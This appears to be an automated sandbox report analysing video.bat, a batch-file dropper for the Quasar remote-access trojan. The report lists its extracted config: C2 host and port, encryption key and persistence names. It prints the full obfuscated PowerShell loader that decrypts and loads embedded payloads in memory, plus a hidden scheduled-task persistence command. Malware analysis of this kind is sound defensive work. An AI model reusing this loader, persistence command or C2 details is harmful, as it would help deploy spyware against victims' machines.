Overview

overview

10

Static

static

1

video.bat

windows10-1703-x64

10

video.bat

windows10-2004-x64

10

video.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    273s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    17-05-2024 17:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    video.bat

  • Size

    1.8MB

  • MD5

    3e23287bf7024e118f144018b5c6ee51

  • SHA1

    e5c30a22a6b46400520809133e02ab824e6f1d8c

  • SHA256

    41216ba83eddf1b01197fb44abbb24e8a83389862a843e6c78ae6a0f9474be34

  • SHA512

    bd5644d745e159b56e67a9ff21390e9bfcbadd2b69530697dce6a8728af029c8d4d6712fe64975b8cde5fe574305b2a8c683c3f80602ec66d4f9a036a7e9fd06

  • SSDEEP

    24576:nFqcE/6HOYP8eW5fvoUjBEcHvlstN2DzKlIBzmfvz/LKkROe5WkEsdov9eAvfGiA:nF0YPtAfv3qzym9ov9KJ

Score
10/10
quasarphantomexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Phantom

C2

even-lemon.gl.at.ply.gg:33587

Mutex

db128a32-6a0f-4592-bc4d-39d508fbe456

Attributes
  • encryption_key

    04017BC2FE671A38FED74363CF7D888C6B8DA217

  • install_name

    $phantom-powershell.exe

  • log_directory

    PHANTOM

  • reconnect_delay

    3000

  • startup_key

    $phantom-powershell

  • subdirectory

    $phantom-phantom2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\video.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2576
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gX7XYLn4dbQdiIUvmYqk2d03PgJBXfcZvi3WFTZZa4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KcZLFz/4shTUK5TFlUW+3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fzajp=New-Object System.IO.MemoryStream(,$param_var); $FzQYM=New-Object System.IO.MemoryStream; $HukBb=New-Object System.IO.Compression.GZipStream($fzajp, [IO.Compression.CompressionMode]::Decompress); $HukBb.CopyTo($FzQYM); $HukBb.Dispose(); $fzajp.Dispose(); $FzQYM.Dispose(); $FzQYM.ToArray();}function execute_function($param_var,$param2_var){ $iMwpu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iFQms=$iMwpu.EntryPoint; $iFQms.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\video.bat';$pGsGT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\video.bat').Split([Environment]::NewLine);foreach ($yaYpE in $pGsGT) { if ($yaYpE.StartsWith(':: ')) { $glRAZ=$yaYpE.Substring(3); break; }}$payloads_var=[string[]]$glRAZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4964
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_826_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_826.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1496
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_826.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2944
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_826.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4896
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gX7XYLn4dbQdiIUvmYqk2d03PgJBXfcZvi3WFTZZa4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KcZLFz/4shTUK5TFlUW+3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fzajp=New-Object System.IO.MemoryStream(,$param_var); $FzQYM=New-Object System.IO.MemoryStream; $HukBb=New-Object System.IO.Compression.GZipStream($fzajp, [IO.Compression.CompressionMode]::Decompress); $HukBb.CopyTo($FzQYM); $HukBb.Dispose(); $fzajp.Dispose(); $FzQYM.Dispose(); $FzQYM.ToArray();}function execute_function($param_var,$param2_var){ $iMwpu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iFQms=$iMwpu.EntryPoint; $iFQms.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_826.bat';$pGsGT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_826.bat').Split([Environment]::NewLine);foreach ($yaYpE in $pGsGT) { if ($yaYpE.StartsWith(':: ')) { $glRAZ=$yaYpE.Substring(3); break; }}$payloads_var=[string[]]$glRAZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:420
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8uu2jcPEqCld.bat" "
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2404
              • C:\Windows\system32\chcp.com
                chcp 65001
                7⤵
                  PID:688
                • C:\Windows\system32\PING.EXE
                  ping -n 10 localhost
                  7⤵
                  • Runs ping.exe
                  PID:4708

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      df472dcddb36aa24247f8c8d8a517bd7

      SHA1

      6f54967355e507294cbc86662a6fbeedac9d7030

      SHA256

      e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

      SHA512

      06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      eb15ee5741b379245ca8549cb0d4ecf8

      SHA1

      3555273945abda3402674aea7a4bff65eb71a783

      SHA256

      b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

      SHA512

      1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\8uu2jcPEqCld.bat
      Filesize

      220B

      MD5

      ab52f0be7c485d7b67e336b992686cdf

      SHA1

      d563a4e3c7f6544754a1f566c55ee5862693eac8

      SHA256

      5505a88f209e6f77654cc8ef663d8aebc8a891a27c9e27975c73e2506a0bf516

      SHA512

      40d1a0c5802f4ca0374d2db6c75274cf8317a1ff3d1cdb0c9b37e76fb60411ae75a08b6461ebcd9ecc9504da790ea4477ff6f3e0c33be08cd35dee27f90ca29c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ncth5e1v.gl4.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\startup_str_826.bat
      Filesize

      1.8MB

      MD5

      3e23287bf7024e118f144018b5c6ee51

      SHA1

      e5c30a22a6b46400520809133e02ab824e6f1d8c

      SHA256

      41216ba83eddf1b01197fb44abbb24e8a83389862a843e6c78ae6a0f9474be34

      SHA512

      bd5644d745e159b56e67a9ff21390e9bfcbadd2b69530697dce6a8728af029c8d4d6712fe64975b8cde5fe574305b2a8c683c3f80602ec66d4f9a036a7e9fd06

      Download Submit

    • C:\Users\Admin\AppData\Roaming\startup_str_826.vbs
      Filesize

      115B

      MD5

      156a20a0c863b93f2a7dd5f83859b218

      SHA1

      0b5f4db62914f67faba4917cfb93e02355487081

      SHA256

      a5364e319168cdcc03a8c3aec3e9892596ae4faa5a08c9e83fd68e6ac47b5a11

      SHA512

      d26627f6e82a8ffab0d56cb1806bc6f3be067dc3a2a0436b52a42c4483efece079acca25b6b088cd3faea34e47c9bc2234d84c42ca7e024a39c3445ae5a9ec32

      Download Submit

    • memory/420-50-0x000001F628EC0000-0x000001F629082000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/420-47-0x000001F627870000-0x000001F627B94000-memory.dmp

      Filesize

      3.1MB

      Download

    • memory/420-53-0x000001F628160000-0x000001F628172000-memory.dmp

      Filesize

      72KB

      Download

    • memory/420-54-0x000001F6281C0000-0x000001F6281FC000-memory.dmp

      Filesize

      240KB

      Download

    • memory/420-48-0x000001F628110000-0x000001F628160000-memory.dmp

      Filesize

      320KB

      Download

    • memory/420-49-0x000001F628220000-0x000001F6282D2000-memory.dmp

      Filesize

      712KB

      Download

    • memory/1496-29-0x00007FFC49720000-0x00007FFC4A1E2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1496-26-0x00007FFC49720000-0x00007FFC4A1E2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1496-25-0x00007FFC49720000-0x00007FFC4A1E2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1496-16-0x00007FFC49720000-0x00007FFC4A1E2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4964-12-0x00007FFC49720000-0x00007FFC4A1E2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4964-11-0x00007FFC49720000-0x00007FFC4A1E2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4964-10-0x00007FFC49720000-0x00007FFC4A1E2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4964-13-0x000001531E630000-0x000001531E638000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4964-14-0x0000015336B70000-0x0000015336CC8000-memory.dmp

      Filesize

      1.3MB

      Download

    • memory/4964-0-0x00007FFC49723000-0x00007FFC49725000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4964-55-0x00007FFC49723000-0x00007FFC49725000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4964-56-0x00007FFC49720000-0x00007FFC4A1E2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4964-9-0x000001531E640000-0x000001531E662000-memory.dmp

      Filesize

      136KB

      Download